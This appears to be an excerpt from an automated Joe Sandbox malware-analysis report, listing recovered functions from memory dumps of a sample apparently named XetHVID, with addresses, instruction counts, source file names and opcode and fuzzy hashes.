                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f8ba4c7a5ab0f074f17cfde57a336064070f3403628d7e60fda0875c66c2c2e8
                                                                  • Instruction ID: 4e3b2d72e7df87e0482c06dadaf04574421a461686e6229f01b73194a642fe0f
                                                                  • Opcode Fuzzy Hash: f8ba4c7a5ab0f074f17cfde57a336064070f3403628d7e60fda0875c66c2c2e8
                                                                  • Instruction Fuzzy Hash: 41D0C231301622435B98621BA4549FFBAA98BC5692304803EE21FC3341DE20CD0686A0
                                                                  Function 08CFE268 Relevance: .0, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 92292d990afcc4846167e81894bad2b7fbb7db4810f3c822cff2d823ab9cc49d
                                                                  • Instruction ID: b610215e9f666591579392cab8d267babf347773d31ea607a45a1524882cae42
                                                                  • Opcode Fuzzy Hash: 92292d990afcc4846167e81894bad2b7fbb7db4810f3c822cff2d823ab9cc49d
                                                                  • Instruction Fuzzy Hash: 10E026313083A10FE31A96295800866BBF76EDA50430CC1AFD809CF656EA209A0687C0
                                                                  Function 073C0DEA Relevance: .0, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 161de1969266ae9a60ef1214c7c3e90c4bf2551d12375320d2876d9170a7df40
                                                                  • Instruction ID: 4a30f117373607ff969d2195e74e97e52937b953c3e1639eb76008c7ce32ab3a
                                                                  • Opcode Fuzzy Hash: 161de1969266ae9a60ef1214c7c3e90c4bf2551d12375320d2876d9170a7df40
                                                                  • Instruction Fuzzy Hash: 84E048F291474CDEDB41EF74C9155D97FF4EF12210B01C96BE489CA011E6348699DB51
                                                                  Function 073C8140 Relevance: .0, Instructions: 21COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1f1e9680038164c22aa4fb328c9f900851e84722d3833021949cf65bb84444e6
                                                                  • Instruction ID: 18392f761410c17764b1e5ba3a420db21b1b8befc82ea6c4910f3b7f866df410
                                                                  • Opcode Fuzzy Hash: 1f1e9680038164c22aa4fb328c9f900851e84722d3833021949cf65bb84444e6
                                                                  • Instruction Fuzzy Hash: 6AE0D8B4109656CFE301DB78C8692AA7BB0EF46304F04C8CB94598B797CB30AD0AC762
                                                                  Function 08CFDE54 Relevance: .0, Instructions: 21COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4b72aef331d6b47637ce7bcde49009e1c5f8e668966edf165b8da6c875c38973
                                                                  • Instruction ID: d98fa8a9565505535d369c5372736e1101a1c352fc8629b96b4b35cd2ce95979
                                                                  • Opcode Fuzzy Hash: 4b72aef331d6b47637ce7bcde49009e1c5f8e668966edf165b8da6c875c38973
                                                                  • Instruction Fuzzy Hash: 08D02B3715501042E5909514FCC17D93361EFC4302F588C6AE141D7144C82A95874200
                                                                  Function 0563EC31 Relevance: .0, Instructions: 20COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8c2b47366963f6449f76980355005068594371fc5ffff6f1fe84afc849a43805
                                                                  • Instruction ID: 38739bda2d963468e4ba0b6727676c2c40f49a499ac07f99162abef6792da8be
                                                                  • Opcode Fuzzy Hash: 8c2b47366963f6449f76980355005068594371fc5ffff6f1fe84afc849a43805
                                                                  • Instruction Fuzzy Hash: 84E09271A10204EFCB00EFB4EA0155D7BB0EB90305B1048ABD809E3685EA36AE01DB24
                                                                  Function 073C9D88 Relevance: .0, Instructions: 20COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6d0910995a31e97ac75e5aa485fa839dfe1d56a545676b7749da3f719b60ff07
                                                                  • Instruction ID: d6289a9f59e25194fcb353c4b7316a4531f43953fd1f4ec2ea869b0522839e6a
                                                                  • Opcode Fuzzy Hash: 6d0910995a31e97ac75e5aa485fa839dfe1d56a545676b7749da3f719b60ff07
                                                                  • Instruction Fuzzy Hash: 25D012D363C104C7F548B568540D736655E9782311F0340AE500F66E8EDD12BC1043A6
                                                                  Function 073CB8F8 Relevance: .0, Instructions: 20COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b081446461429ccb94575bdc78116977c2b7d902d7fc4f748d3a576077984a10
                                                                  • Instruction ID: daef59e8d65619a086c1bfe5389688d1f2d80526c68e933629646bc51eee7e41
                                                                  • Opcode Fuzzy Hash: b081446461429ccb94575bdc78116977c2b7d902d7fc4f748d3a576077984a10
                                                                  • Instruction Fuzzy Hash: C0D017E0A3C10CDB6250EA99644313AF6ACA78B222F0048CEA84FD7F04D9222D0043B3
                                                                  Function 08CF11B8 Relevance: .0, Instructions: 20COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 515b883d83a7a6a9a8dcc7dffe1515c7832b036d418f3ea6441f5f7e0d79c175
                                                                  • Instruction ID: 8f2211a8670ec0da69d9f4af8cdbdd575b9bd36cac635ed669e961e92e327523
                                                                  • Opcode Fuzzy Hash: 515b883d83a7a6a9a8dcc7dffe1515c7832b036d418f3ea6441f5f7e0d79c175
                                                                  • Instruction Fuzzy Hash: A1E08670601209EFCB04EFB8E505A9DB7F5EB40315F5045AAA40897351DBB02F00DB60
                                                                  Function 0563EC40 Relevance: .0, Instructions: 19COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 922fd2f53054af8d6f0ed22079c0b956234a8e4f9532f0134a941950c97712e7
                                                                  • Instruction ID: 017b47469552046e75c065116fdf6516bf46c021c6b2d99206daf0bc4f314a2d
                                                                  • Opcode Fuzzy Hash: 922fd2f53054af8d6f0ed22079c0b956234a8e4f9532f0134a941950c97712e7
                                                                  • Instruction Fuzzy Hash: 47E04F71A00218FFCB00EFA8EA4155CBBB9EB84205B108599E80893704EA326E009B60
                                                                  Function 073CAE9B Relevance: .0, Instructions: 19COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 552a90a1e58dfabc3a13c30366f1fa86b3fa2cbbb12deca8b80ea4664c487a11
                                                                  • Instruction ID: 5e3b7dd47efaa2aada5d2006bb58190566e20cd0ccc6d821a889627c52ac52b7
                                                                  • Opcode Fuzzy Hash: 552a90a1e58dfabc3a13c30366f1fa86b3fa2cbbb12deca8b80ea4664c487a11
                                                                  • Instruction Fuzzy Hash: 84E01AF1D197858FD705DF78C8A6269FFB1FE42204B18809FD0689B217C730691ACB92
                                                                  Function 073C0DF8 Relevance: .0, Instructions: 17COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d3f2f9275ce7d16a02ec48914e4a9db890e13fa6dc64c02ed34a2ad1a76ebc08
                                                                  • Instruction ID: ee00f73573fb2109c86fdc68ce545255c3e78c286bd3eaf210884a9ae7645b17
                                                                  • Opcode Fuzzy Hash: d3f2f9275ce7d16a02ec48914e4a9db890e13fa6dc64c02ed34a2ad1a76ebc08
                                                                  • Instruction Fuzzy Hash: 4FE01771850A0CDECB44EF78D90859E7BE8AB05224F00C53AE84D9A110FA31D6E8DF90
                                                                  Function 073C20D8 Relevance: .0, Instructions: 16COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 781fc262a0d61dd055614d61177d6c900d3ca85a81d292b12ec22f711a3dfea7
                                                                  • Instruction ID: e5cdb6519a80e3764ce11f127c11fa86c728513832f5b77cfc6487baced3d1a0
                                                                  • Opcode Fuzzy Hash: 781fc262a0d61dd055614d61177d6c900d3ca85a81d292b12ec22f711a3dfea7
                                                                  • Instruction Fuzzy Hash: 55D0A7307002044BA3047FB6B85B3BA37DEEF80555B418015B50DC35C1DF24D851C721
                                                                  Function 0563A4A0 Relevance: .0, Instructions: 15COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: efb0325059e3e7326e8eab9ba429012993525e4fee136b75c1340298fc998832
                                                                  • Instruction ID: 939ebc1806528a33f4abb56089c7b780d2a960dd47ffbe05219a12adebacbb64
                                                                  • Opcode Fuzzy Hash: efb0325059e3e7326e8eab9ba429012993525e4fee136b75c1340298fc998832
                                                                  • Instruction Fuzzy Hash: 92D0A73730E3808FC7514774692D2D53F65DB96212B0404FBE548C6656D63C8845C361
                                                                  Function 073CC0A0 Relevance: .0, Instructions: 14COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1a976762714ef4939b91ec77b56db51a6aaed5d4b7f33b24f8e89805e14f87d7
                                                                  • Instruction ID: 66aa1c4bcb3970c69fcb70c953e99c2393184caf7de33cecdd70bbe0bd263066
                                                                  • Opcode Fuzzy Hash: 1a976762714ef4939b91ec77b56db51a6aaed5d4b7f33b24f8e89805e14f87d7
                                                                  • Instruction Fuzzy Hash: F4C012F123CA38CAB100D1A814245393A9D668A206F20740F950F82E42CE12CC040773
                                                                  Function 0563A4B0 Relevance: .0, Instructions: 13COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a2537905e525f338685ce7a63ca92de20633d806721fd2222263f9ae971ec76e
                                                                  • Instruction ID: 6e6eead55a7eb9ae4a1f8f996fb48b49a434749d786ec33db6539b24e035f1a8
                                                                  • Opcode Fuzzy Hash: a2537905e525f338685ce7a63ca92de20633d806721fd2222263f9ae971ec76e
                                                                  • Instruction Fuzzy Hash: C2C08C32211324DBC71427B8A8096DA3BDDEB8A226B000076F10DC2710CBBA880187E1
                                                                  Function 0563A770 Relevance: .0, Instructions: 13COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9bfba884c23f764a5ce47c2b5f66373011b0ed97782e3a7764d7f859fcb7d60e
                                                                  • Instruction ID: 9f0cce1dc6fcb0ca50c952d1ccf832796b3726d36466e77a98f34962eff1d92f
                                                                  • Opcode Fuzzy Hash: 9bfba884c23f764a5ce47c2b5f66373011b0ed97782e3a7764d7f859fcb7d60e
                                                                  • Instruction Fuzzy Hash: F7C08072115360CBE714AF68A4803517FE1DF47130F45CD6D508493E01D13588098780
                                                                  Function 0563B0B0 Relevance: .0, Instructions: 13COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 77d7338a71020fa9a91bb30022c9db5e776e6464cb8090be39ff0c6d2b7a748c
                                                                  • Instruction ID: 16ed97495b51d07a31e23cc53f1d36a02ea4220431071708abc09a444d239963
                                                                  • Opcode Fuzzy Hash: 77d7338a71020fa9a91bb30022c9db5e776e6464cb8090be39ff0c6d2b7a748c
                                                                  • Instruction Fuzzy Hash: 83E01775A40209CFC700CFA8E09AAADBFB0EF0C310F208059E412E73A1CB705844CF50
                                                                  Function 073C6681 Relevance: .0, Instructions: 13COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ff1ae8668f9d39340d7ca28ca03dbbb6d3a2026ddd83c492bb8d402170b7f6a9
                                                                  • Instruction ID: 00b7b6236f3ed9899ee3b0f672fc851fb366ab51aa0a55762f1e5f1be8f83188
                                                                  • Opcode Fuzzy Hash: ff1ae8668f9d39340d7ca28ca03dbbb6d3a2026ddd83c492bb8d402170b7f6a9
                                                                  • Instruction Fuzzy Hash: ECC012A102C3C98BD30202A4B41B0BABF3C0803224B060097E5498D853850968A087A2
                                                                  Function 08CF91EE Relevance: .0, Instructions: 13COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c32f268f4176f6706cf87cb8f1e0afb7e29e52a854f0384631abdb63b139bcd7
                                                                  • Instruction ID: 94bacdac904513f53395507b5a47d64eb568a12b096effd35528d7563d5ddc1b
                                                                  • Opcode Fuzzy Hash: c32f268f4176f6706cf87cb8f1e0afb7e29e52a854f0384631abdb63b139bcd7
                                                                  • Instruction Fuzzy Hash: E2D0A92482D7D40EC7037738680404ABF70EE5310074642A7C084AA0A3EA240668C3A2
                                                                  Function 0563AB11 Relevance: .0, Instructions: 12COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9c065956341689cc2fc601a9d5bb093f35713ee74aba10dc6d88cdc41eeed4f3
                                                                  • Instruction ID: a6a55cbfd11d03ada2e6c4c701770f5153598c027eb963769b951272c352604a
                                                                  • Opcode Fuzzy Hash: 9c065956341689cc2fc601a9d5bb093f35713ee74aba10dc6d88cdc41eeed4f3
                                                                  • Instruction Fuzzy Hash: 15D0C935502226DBEF50A656EA4A76E7BA3E3C032EF088660904A82E49CA7C54CAC740
                                                                  Function 08CF921A Relevance: .0, Instructions: 12COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ef2c612f88dd5746e5f7c795935e5facfc797c3ba313adb224b06449d2ee1cac
                                                                  • Instruction ID: 5a4f4d3c2af1f14e18ecbe2b35fd4c8fe0b95022e7024cd11bd9397817c0a6f1
                                                                  • Opcode Fuzzy Hash: ef2c612f88dd5746e5f7c795935e5facfc797c3ba313adb224b06449d2ee1cac
                                                                  • Instruction Fuzzy Hash: 4ED09E751052849FC7428B61C5459457F71EF1621071A80DBE448CB673D231D929CB51
                                                                  Function 073CE428 Relevance: .0, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4c5cf78a7fcde221a1b3d40af95cdbfa43ed0ae1506d441e286c8dd01963e91a
                                                                  • Instruction ID: 279b20b4d15241c658b661d1e78370f949c71b32a041aee16aa33d68bedcb248
                                                                  • Opcode Fuzzy Hash: 4c5cf78a7fcde221a1b3d40af95cdbfa43ed0ae1506d441e286c8dd01963e91a
                                                                  • Instruction Fuzzy Hash: 3BC08CB00412288BE6146BA8B80E364BA6C6700302F882010E70E15421DF680800C661
                                                                  Function 073CBCB0 Relevance: .0, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4c081ac479888581ba445ea8c91d46a6b586562156c279c663f920327f15878b
                                                                  • Instruction ID: e780ccf2d7e9b895371a159a5e5e6cc31a7f6d711b2afd0d26623d12bd7e6d11
                                                                  • Opcode Fuzzy Hash: 4c081ac479888581ba445ea8c91d46a6b586562156c279c663f920327f15878b
                                                                  • Instruction Fuzzy Hash: 31D012F2418160DFC300CB51DDD6C987FF0BF0E34070549CAC0054B222D330A411CB41
                                                                  Function 073C1A7E Relevance: .0, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c3238a43dd4ac5ea648fc60b3499a1889afa6cd0f90b56f3b683e495b973deba
                                                                  • Instruction ID: bed1a6025494bf33a26274ed8e89d9172263d84bd02d610ef6a263259d8e8b79
                                                                  • Opcode Fuzzy Hash: c3238a43dd4ac5ea648fc60b3499a1889afa6cd0f90b56f3b683e495b973deba
                                                                  • Instruction Fuzzy Hash: ABD09270A092828AD3598B2CA004301BE907B55304F1881EEA1488A347D7B6E5C4CBA5
                                                                  Function 073CA2A8 Relevance: .0, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 661b0d7b8ae5d7f4c7d0bd318381ce2903be3471d98c491cc45e60ffd7d32b56
                                                                  • Instruction ID: cbee609694c08a99acac6753252e8e531768caa7171fa4f45138d3eec43517f5
                                                                  • Opcode Fuzzy Hash: 661b0d7b8ae5d7f4c7d0bd318381ce2903be3471d98c491cc45e60ffd7d32b56
                                                                  • Instruction Fuzzy Hash: 40B092E29208408AF702F0A0C9A3B6A2600ABB1200B3288158A08E0244EA1AE5A341A7
                                                                  Function 073CC2F0 Relevance: .0, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b32a0327da5c28835fa8f0b45a4fafba1f36e6d2ccf2575bf5daa0575ce104a1
                                                                  • Instruction ID: cbac646c7c175f68abc58268c33518b41223e35ba9aace1b7e1f155d7ce0991c
                                                                  • Opcode Fuzzy Hash: b32a0327da5c28835fa8f0b45a4fafba1f36e6d2ccf2575bf5daa0575ce104a1
                                                                  • Instruction Fuzzy Hash: AEB092F503C22CC22D00E1D82C292353A1C6007A11F40205EA18F20D0109011C510372
                                                                  Function 08CF9228 Relevance: .0, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
                                                                  • Instruction ID: 61412fa5721fa0801f19765b42d0f6ac58f054d2697597a3f249e516f761f0d5
                                                                  • Opcode Fuzzy Hash: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
                                                                  • Instruction Fuzzy Hash: 87C00235140108AFC740DF55D445D95BBA9EB59660B1180A1F9484B722C632E9119A90
                                                                  Function 0563A690 Relevance: .0, Instructions: 8COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 43bbb33ac88ddc989f72bb816129f493ec02b024480f6f70939046159c23b4de
                                                                  • Instruction ID: c37da43482be65c5f0d690352f33c578e9bbd994129ff4b5bde1e3e9bde8da13
                                                                  • Opcode Fuzzy Hash: 43bbb33ac88ddc989f72bb816129f493ec02b024480f6f70939046159c23b4de
                                                                  • Instruction Fuzzy Hash: 6EB092AB2201000BDB545640C8CA3D42BA1EB02326FD908A980808AE40EA6E410E8B8A
                                                                  Function 073C770C Relevance: .0, Instructions: 8COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3c66c5a4193562eecf74c9227d72fca01179231032755ec0cada69165d6a24a9
                                                                  • Instruction ID: 6f84e7b1fff243a319d678225c0d51e706917f295629b38fe3bcb6989feb65cc
                                                                  • Opcode Fuzzy Hash: 3c66c5a4193562eecf74c9227d72fca01179231032755ec0cada69165d6a24a9
                                                                  • Instruction Fuzzy Hash: 75B092E51A8609A3A000A2A45889A3A5890EBB2701B408D0A2A8D20020892248A8971B
                                                                  Function 073CB9C1 Relevance: .0, Instructions: 8COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6aa1efa31872790da679d12e62022170f8802ad7f02a13c3ed190cf460845d8f
                                                                  • Instruction ID: e9bdc1abc319992ce6ec0d0f5dbf46f17c053fdde2ffd9a6f5e871f43a276c78
                                                                  • Opcode Fuzzy Hash: 6aa1efa31872790da679d12e62022170f8802ad7f02a13c3ed190cf460845d8f
                                                                  • Instruction Fuzzy Hash: A9C04CF0B60219EFFB11CA51DE87DACF66E6B46B00F104514E74676594DB6049018740
                                                                  Function 0563738C Relevance: .0, Instructions: 7COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d742a260cd230f4bb51a277b9e07a4a4cbae0b154fad74441064de99716e1432
                                                                  • Instruction ID: 092f9bff9a80928c5aebdf373f20ca213efee448e070cc9fbb826287203ab0cd
